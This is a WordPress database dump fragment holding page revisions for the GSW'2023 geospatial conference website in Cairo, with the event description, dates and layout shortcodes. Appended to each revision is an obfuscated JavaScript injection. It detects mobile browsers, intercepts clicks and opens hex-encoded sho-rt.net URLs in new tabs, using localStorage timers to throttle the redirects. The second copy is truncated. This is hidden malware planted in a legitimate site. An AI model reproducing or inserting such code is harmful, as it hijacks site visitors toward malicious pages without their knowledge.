css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\n\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:25:38','2022-11-09 18:25:38','',3066,'https://gsw2023.com/?p=3187',0,'revision','',0),
(3188,1,'2022-11-09 18:27:16','2022-11-09 18:27:16','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 